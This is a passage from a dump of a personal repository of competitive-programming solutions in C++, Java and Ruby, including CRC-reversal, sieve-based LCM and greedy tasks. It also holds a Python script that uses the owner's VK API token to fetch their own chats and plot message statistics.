< b.id; });\n fori(q)\n if (auto& r = requests[i]; r.i > r.j)\n {\n uint crcreg = 0;\n if (r.j)\n crcreg = t.get(0, r.j - 1);\n dumpValue(crcreg ^ FINALXOR, r.ans);\n\n uint tcrcreg = crc ^ FINALXOR;\n for (int k = n - 1; k >= r.i + 4; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ a[k];\n for (int k = 3; k >= 0; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ r.x[k];\n for (int k = r.i - 1; k >= r.j + 4; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ a[k];\n for (int k = 3; k >= 0; --k)\n tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ r.ans[k];\n dumpValue(tcrcreg, r.ans);\n }\n //{\n //uint crcreg = calc_crc(a.begin(), a.begin() + j);\n //crcreg ^= FINALXOR;\n //for (int k = n - 1; k >= 
j; --k)\n //crcreg = (crcreg << 8) ^ rev_table[crcreg >> 24] ^ a[k];\n //forn(k, 4)\n //a[i + k] = (crcreg >> k * 8) & 0xFF;\n //writeln(a[j], a[j + 1], a[j + 2], a[j + 3]);\n //};\n\n fori(q)\n writeln(requests[i].ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4738546311855316, "alphanum_fraction": 0.49295774102211, "avg_line_length": 29.27941131591797, "blob_id": "db549735d2b76718ea2242b621fd5794b60e0294", "content_id": "80e9d8503af967d1e1ac4ce8213321108584a175", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6177, "license_type": "no_license", "max_line_length": 162, "num_lines": 204, "path": "/CodeForce/1154/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n#ifndef ONLINE_JUDGE\n# define N 10000\n#else\n# define N 10000001\n#endif\n\nvector<int> cache[N];\nint minPrime[N];\nint prev[N];\n\n//linearSieve\nstruct linearSieve\n{\n vector<int> primes;\n\n linearSieve()\n {\n for (int i = 2; i < N; i++)\n {\n if (minPrime[i] == 0)\n primes.push_back(i),\n minPrime[i] = i;\n for (int prime : primes)\n {\n int temp = prime * i;\n if (temp < N && prime <= minPrime[i])\n minPrime[temp] = prime,\n prev[temp] = i;\n else\n break;\n }\n }\n }\n\n void factorization(int x)\n {\n int X = x;\n if (SZ(cache[x])) return;\n vector<pii> temp;\n int p = -1;\n int pp = -1;\n while (x > 1)\n {\n pp = p;\n p = minPrime[x];\n if (p != pp)\n temp.pb({p, 1});\n else\n temp.back().second++;\n x = prev[x];\n }\n vector<int> divisors;\n function<void(int, int)> gen = [&](int v, int j) {\n if (j == SZ(temp))\n {\n if (v > 1)\n divisors.pb(v);\n return;\n }\n gen(v, j + 1);\n fori(temp[j].second)\n gen(v *= temp[j].first, j + 1);\n };\n gen(1, 0);\n cache[X] = divisors;\n }\n\n bool isPrime(int x)\n {\n return minPrime[x] == x;\n }\n};\n//Igorjan\n//}}}\n\nvoid run()\n{\n linearSieve s;\n //int q = 100; s.factorization(q); vector<int> f = cache[q]; writeln(SZ(f), f);\n //return;\n int n;\n scanf(\"%d\", &n);\n vi a(n);\n fori(n)\n scanf(\"%d\", &a[i]);\n int first = min_element(whole(a)) - a.begin();\n int second = -1;\n int mn = MOD;\n fori(n) if (i != first && mn > a[i]) mn = a[second = i];\n auto lcm = [&](int i, int j) {\n return a[i] * 1ll * a[j] / gcd(a[i], a[j]);\n };\n ll ans = lcm(first, 
second);\n vector<vector<int>> m(10000001);\n fori(n)\n {\n s.factorization(a[i]);\n const auto& f = cache[a[i]];\n //if (SZ(f) >= 300)\n //writeln(a[i], SZ(f));\n //continue;\n //if (i % 1000 == 0) writeln(i), writeln(SZ(f), a[i]), cout.flush();\n for (const int& d : f)\n {\n auto& temp = m[d];\n if (temp.size() <= 1)\n {\n temp.pb(i);\n if (temp.size() == 2 && a[temp[0]] > a[temp[1]])\n swap(temp[0], temp[1]);\n }\n else\n {\n if (a[temp[0]] > a[i])\n temp[1] = temp[0],\n temp[0] = i;\n else if (a[temp[1]] > a[i])\n temp[1] = i;\n }\n }\n }\n fori(N)\n if (const auto& temp = m[i]; temp.size() >= 2)\n if (ll l = a[temp[0]] / i * 1ll * a[temp[1]]; l < ans)\n ans = l,\n first = temp[0],\n second = temp[1];\n\n writeln(min(first, second) + 1, max(first, second) + 1);\n //cerr << lcm(first, second) << \"\\n\";\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>const&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void 
read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.33988094329833984, "alphanum_fraction": 0.34166666865348816, "avg_line_length": 23.462121963500977, "blob_id": "a4285acacc51af5bc7d946525fd21df6a13ef3d5", "content_id": "13b5501d49e6516de11d9a9cf981d3ad4936301e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4711, "license_type": "no_license", "max_line_length": 78, "num_lines": 132, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/F.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\n \r\nimport static java.lang.Math.*;\r\n \r\npublic class F {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n    final static Random rnd = new Random();\r\n \r\n    public void solve() {\r\n        int f = in.nextInt();\r\n        boolean ok = true;\r\n \r\n        for (int i = 0; i < f; i++) {\r\n            int t = in.nextInt(), n = in.nextInt();\r\n            boolean[] x = new boolean[t + 1], y = x.clone(), z;\r\n \r\n            Arrays.fill(x, true);\r\n \r\n            for (int j = 0; j < n; j++) {\r\n                Arrays.fill(y, false);\r\n                int l = in.nextInt(), r = in.nextInt();\r\n                int d = r - l;\r\n \r\n                for (int u = 0; u <= t; u++) {\r\n                    if (x[u]) {\r\n                        {\r\n                            int v = u + d;\r\n                            if (0 <= v && v <= t) {\r\n                                y[v] = true;\r\n                            }\r\n                        }\r\n                        {\r\n                            int v = u - d;\r\n                            if (0 <= v && v <= t) {\r\n                                y[v] = true;\r\n                            }\r\n                        }\r\n                    }\r\n                }\r\n \r\n \r\n                z = 
x;\r\n                x = y;\r\n                y = z;\r\n \r\n            }\r\n \r\n            boolean cur = false;\r\n \r\n            for (boolean val : x) {\r\n                cur |= val;\r\n            }\r\n            ok &= cur;\r\n        }\r\n \r\n        out.println(ok ? \"possible\" : \"impossible\");\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n 
       }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new F().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.5180788040161133, "alphanum_fraction": 0.5299514532089233, "avg_line_length": 27.218273162841797, "blob_id": "8c01565f65f218264d103285632649151403caa2", "content_id": "33289eaa71602731090dd57ee5d5cab5280f51f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5559, "license_type": "no_license", "max_line_length": 165, "num_lines": 197, "path": "/CodeForce/0521/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 16 February 2015\n#include <bits/stdc++.h>\n/*\n#include <ext/rope>\n#include <ext/pb_ds/assoc_container.hpp>\n#include <ext/pb_ds/tree_policy.hpp>\n\nusing namespace __gnu_cxx;\nusing namespace __gnu_pbds;\ntypedef tree<int, int/null_type, less<int>, rb_tree_tag, tree_order_statistics_node_update> orderedMap;\n*/\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define fst first\n#define snd second\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define eb emplace_back\n#define vs vector<string>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int>>\n#define pll pair<long long, long long>\n#define elohw(a) a.rbegin(), a.rend()\n#define whole(a) a.begin(), a.end()\n#define next 
_next\n#define prev _prev\n\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n#define wr(args...) err(split(#args,',').begin(),args)\n\n#define FILENAME \"input\"\n#define INF 1000000009\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n#define ints(args...) int args; readln(args)\n#define lls(args...) ll args; readln(args)\n#define vints(args...) 
vi args; readln(args)\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nstruct node\n{\n int x, y, v;\n\n node(int x, int y, int v)\n {\n this->x = x;\n this->y = y;\n this->v = v;\n }\n\n bool operator<(node const& b) const\n {\n if (x != b.x)\n return x < b.x;\n return y < b.y;\n }\n\n node(){}\n\n};\n\nbool cmp(node const& a, node const& b)\n{\n return a.v < b.v;\n}\n\nint x, y, v;\nmap<pii, int> a;\nset<node, bool(*)(node const&, node const&)> values(cmp);\n\nbool check(pii const& p)\n{\n#define x first\n#define y second\n for (int i = p.x - 1; i < p.x + 2; i++)\n if (a.find({i, p.y + 1}) != a.end())\n {\n int ok = 0;\n for (int j = i - 1; j < i + 2; j++)\n if (a.find({j, p.y}) != a.end())\n ok++;\n if (ok == 1)\n return false;\n }\n#undef x\n#undef y\n return true;\n}\n\nvoid run()\n{\n ints(n);\n fori(n)\n readln(x, y),\n a[{x, y}] = i;\n for (auto p : a)\n if (check(p.first))\n values.insert(node(p.first.first, p.first.second, p.second));\n ll answer = 0;\n fori(n)\n {\n if (values.size() == 0)\n {\n writeln(\"FUUUUUU\");\n return;\n }\n auto temp = i & 1 ? 
*values.begin() : *values.rbegin();\n answer = (answer * n + temp.v) % INF;\n values.erase(temp);\n a.erase({temp.x, temp.y});\n auto it = a.begin();\n for (int j = temp.x - 1; j < temp.x + 2; j++)\n if ((it = a.find({j, temp.y - 1})) != a.end())\n if (check({j, temp.y - 1}))\n values.insert(node(j, temp.y - 1, it->second));\n for (int j = temp.x - 2; j < temp.x + 3; j++)\n if ((it = a.find({j, temp.y})) != a.end())\n if (!check({j, temp.y}))\n values.erase(node(j, temp.y, it->second));\n }\n writeln(answer);\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5199501514434814, "alphanum_fraction": 0.5361595749855042, "avg_line_length": 19.58974266052246, "blob_id": "c86d881d0f5d0e655c0766dfad99b15caa5f1549", "content_id": "a5ebdec05aeef3e02aaa154fa48decac7c529b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 802, "license_type": "no_license", "max_line_length": 47, "num_lines": 39, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define 
mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nconst double EPS = 1e-9;\nconst int INF = 1e9;\n \ntypedef long long ll;\ntypedef long double ld;\ntypedef vector<int> vi;\n \nint main() {\n// freopen(TASKNAME\".in\", \"r\", stdin);\n// freopen(TASKNAME\".out\", \"w\", stdout);\n int n;\n cin >> n;\n vi a(n);\n fori(n)\n cin >> a[i];\n sort(all(a));\n int i = 0;\n ll sum = 0;\n while (i < n - 1 && a[i] + sum <= a.back())\n sum += a[i++];\n cout << i + 1 << \"\\n\";\n return 0;\n}" }, { "alpha_fraction": 0.574018120765686, "alphanum_fraction": 0.5931520462036133, "avg_line_length": 20.56818199157715, "blob_id": "b66e7bd851dee7d3435e3f2cfac604dd04670ff3", "content_id": "3f4ae4c6d21d64e4b7b74747ae518267d4c0de0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 993, "license_type": "no_license", "max_line_length": 59, "num_lines": 44, "path": "/study/task7/Digit.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.io.Serializable;\r\n\r\npublic class Digit implements Serializable {\r\n\tpublic int label;\r\n\tpublic final int len;\r\n\tpublic final int size;\r\n\tprivate final double[] signal;\r\n\r\n\tpublic Digit(double[] signal, int len, int label) {\r\n\t\tthis.size = len * len + 1;\r\n\t\tthis.signal = new double[len * len + 1];\r\n\t\tfor (int i = 0; i < size - 1; i++)\r\n\t\t\tthis.signal[i] = signal[i];\r\n\t\tthis.signal[size - 1] = -1;\r\n\t\tthis.label = label;\r\n\t\tthis.len = len;\r\n\t}\r\n\t\r\n\tpublic Digit(byte[] buffer, int off, int len, int label) {\r\n\t\tthis.len = len;\r\n\t\tthis.size = len * len + 1;\r\n\t\tthis.label = label;\r\n\t\tsignal = new double[size];\r\n\t\tfor (int i = 0; i < 
size - 1; i++)\r\n\t\t\tsignal[i] = (buffer[i + off] & 0xff) / 255.0;\r\n\t\tsignal[size - 1] = -1;\r\n\t}\r\n\r\n\tdouble getSignal(int i) {\r\n\t\treturn signal[i];\r\n\t}\r\n\r\n\tdouble getSignal(int x, int y) {\r\n\t\treturn signal[x + len * y];\r\n\t}\r\n\t\r\n\tdouble[] getSignal() {\r\n\t\treturn signal;\r\n\t}\r\n\r\n\tprivate static final long serialVersionUID = 10L;\r\n}\r\n" }, { "alpha_fraction": 0.6284486055374146, "alphanum_fraction": 0.6383016705513, "avg_line_length": 38.588653564453125, "blob_id": "62069082b9e547035b557e3e153c82db3f3475a2", "content_id": "9e8acf1c0eb38c45d1144ab8848ce0732899372d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5582, "license_type": "no_license", "max_line_length": 147, "num_lines": 141, "path": "/scripts/vk.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom library import *\n\ndef vk(method, **kwargs):\n params = dotdict(kwargs)\n if not 'v' in params: params.v = '5.92'\n params.access_token = loadJsonFromFile('~/.config/vk200/vk.json').vk.access_token\n ret = requests.get('https://api.vk.com/method/' + method, params = params).json()\n if 'error' in ret:\n print(f'Error in {method}: {ret.error.error_msg}', kwargs)\n return ret.error\n return ret.response\n\ndef unlimitedVk(method, field, max_count, verbose = False, **kwargs):\n def getter(**kwargs):\n return vk(method, **kwargs);\n return unlimited(getter, field, max_count, verbose = verbose, **kwargs)\n\ndef getPhoto(url, path, peer_id):\n files = {'photo': open(path, 'rb')}\n attach = requests.post(url, files = files)\n return vk('photos.saveMessagesPhoto', attach.json())[0]\n\ndef sendPhoto(paths, peer_id):\n url = vk('photos.getMessagesUploadServer', {'peer_id': peer_id})['upload_url']\n photos = [getPhoto(url, path, peer_id) for path in paths.split(' ')]\n strings = ['photo' + str(photo['owner_id']) + '_' + str(photo['id']) for photo in photos]\n 
vk('messages.send', {'attachment': ','.join(strings), 'random_id': random.randint(0, 2 ** 31), 'peer_id': peer_id})\n\ndef getMe():\n return vk('users.get')[0]\n\ndef getFriends():\n return unlimitedVk('friends.get', 'items', 5000, fields = 'nickname') + [getMe()]\n\ndef getChats():\n return list(filter(lambda conversation: conversation.conversation.peer.type == 'chat', unlimitedVk('messages.getConversations', 'items', 200)))\n\ndef getFriendsDict():\n return dict(map(lambda user: (str(user.id), user.first_name + ' ' + user.last_name), getFriends()))\n\ndef getChatsDict():\n return dict(map(lambda chat: (str(chat.conversation.peer.id), chat.conversation.chat_settings.title), getChats()))\n\ndef getConversations():\n cacheFriends = '~/.cache/vk200/friends.json'\n friends = loadJsonFromFile(cacheFriends)\n if friends is None:\n friends = {**getChatsDict(), **getFriendsDict()}\n saveJsonInFile(friends, cacheFriends)\n return friends\n\[email protected]()\[email protected]('-f', '--filename', help='input file', type=click.File('r'), default='./corpuses/corpus.json')\[email protected]('-o', '--output', help='output file', type=click.File('w'), default='./corpuses/corpus.txt')\ndef jsonCorpusToTxt(filename, output):\n j = loadJsonFromFile(filename)\n for k, v in j.items():\n output.write(str(v) + ' ' + k + '\\n')\n output.close()\n\[email protected]()\[email protected]('-f', '--filename', help='output file', type=click.File('w'), default='./corpuses/corpus.json')\[email protected]('-o', '--out', is_flag=True, help='inbox/outbox messages', default=True)\[email protected]('-m', '--max_iterations', type=int, help='count of pages of messages', default=-1)\[email protected]('peer_id', required=True, type=click_completion.DocumentedChoice(getConversations()), nargs=1)\ndef getMessagesCorpus(peer_id, out, filename, max_iterations):\n import re\n MAX_COUNT = 200\n messages = unlimitedVk('messages.getHistory', 'items', MAX_COUNT, True, peer_id = peer_id, max_iterations = 
max_iterations)\n messages = list(map(lambda message: message.text.lower(), filter(lambda message: not (message.out ^ out), messages)))\n words = []\n for message in messages:\n words += re.split(r'[^\\w\\s\\d-]|\\n', message)\n words = list(filter(len, words))\n corpus = {}\n for word in words:\n word = word.split()\n for j in range(1, 4):\n for i in range(len(word) - j + 1):\n temp = ' '.join(word[i + k] for k in range(j))\n corpus[temp] = corpus.get(temp, 0) + 1\n c = []\n saveJsonInFile(corpus, filename)\n\[email protected]()\[email protected]('peer_ids', required=True, type=click_completion.DocumentedChoice(getConversations()), nargs=-1)\[email protected]('-s', '--stacked', is_flag=True, help='Stacked mode', default=True)\[email protected]('-d', '--separated', is_flag=True, help='Stat for one dialog', default=False)\ndef histogramMessagesByDate(peer_ids, stacked, separated):\n from datetime import datetime\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n import numpy\n\n friends = getConversations()\n MAX_COUNT = 200\n DATE_FORMAT = '%d-%m-%y'\n\n users = {}\n legend = []\n days = []\n dates = []\n\n def getDate(message):\n return message.date\n\n def add(curr, peer_id):\n if not peer_id in friends: return\n temp = (curr[0] - curr[-1]) // (24 * 60 * 60)\n days.append(temp)\n dates.append(curr)\n legend.append(f'{friends[peer_id]}, {temp} days long, {len(curr)} messages')\n\n for peer_id in peer_ids:\n curr = unlimitedVk('messages.getHistory', 'items', MAX_COUNT, True, peer_id = peer_id)\n for message in curr:\n peer_id = str(message.from_id if separated else peer_ids[0])\n if not peer_id in users:\n users[peer_id] = []\n users[peer_id].append(getDate(message))\n\n for peer_id, curr in users.items():\n add(curr, peer_id)\n\n fig, ax = plt.subplots(1, 1)\n datelist = []\n for xx in dates:\n cur = numpy.array(list(map(lambda x: x * 1000, xx)), dtype='datetime64[ms]')\n datelist.append(list(map(int, mdates.date2num(cur))))\n\n 
ax.hist(datelist, bins=max(days), stacked=stacked)\n ax.legend(legend)\n ax.xaxis.set_major_formatter(mdates.DateFormatter(DATE_FORMAT))\n plt.xlabel('Date')\n plt.ylabel('Count of messages')\n plt.show()\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.5102040767669678, "alphanum_fraction": 0.5306122303009033, "avg_line_length": 23.5, "blob_id": "709269baafd582d462c16ad63d3b8558c0417e4d", "content_id": "71cdee77734a4dbdb5181cace62ebeae3cb6d991", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 49, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/2017/newYear/A.rb", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "b, c, d = gets.split.map(&:to_i)\nprint c - d + 1\n" }, { "alpha_fraction": 0.35841837525367737, "alphanum_fraction": 0.37372449040412903, "avg_line_length": 23.5, "blob_id": "62331f231e73229ca0865619f8eaf408b8a9f537", "content_id": "feaf5b0cbba5191d252344770ab8d63d9634d271", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 784, "license_type": "no_license", "max_line_length": 62, "num_lines": 32, "path": "/TopCoder/TCO1A/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\nclass Similars \n{\npublic:\n int maxsim(int L, int R) \n {\n int ans = 0;\n set<int> a;\n for (int i = L; i <= R; i++)\n {\n int j = i;\n int temp = 0;\n while (j >= 10)\n temp |= (1 << (j % 10)),\n j /= 10;\n temp |= (1 << j);\n if (a.find(temp) != a.end())\n ans = max(ans, __builtin_popcount(temp));\n a.insert(temp);\n }\n for (auto x : a)\n for (auto y : a)\n if (x != y)\n ans = max(ans, __builtin_popcount(x & y));\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.3055555522441864, "alphanum_fraction": 0.3055555522441864, 
"avg_line_length": 4.538461685180664, "blob_id": "1fd819b495c92bd7926b4eceb0a346958e8c4db0", "content_id": "f440db3ce2942ad0b8ac2c4ed3b0e1330bd797ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 72, "license_type": "no_license", "max_line_length": 13, "num_lines": 13, "path": "/CodeForce/1663/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//\\\n(*\nint main() {}\n//\\\n*)\n//\\\nbegin\n//\\\n writeln();\n//\\\nend.\n//\\\n*/\n" }, { "alpha_fraction": 0.44977569580078125, "alphanum_fraction": 0.4613337516784668, "avg_line_length": 23.766477584838867, "blob_id": "e13969cc143eb101e3236109585b74b3029bb171", "content_id": "dcbad0d0da5f32dd2b44cb3623889ad791b16f14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13151, "license_type": "no_license", "max_line_length": 174, "num_lines": 531, "path": "/CodeForce/1751/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n \nusing namespace std;\n \n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for 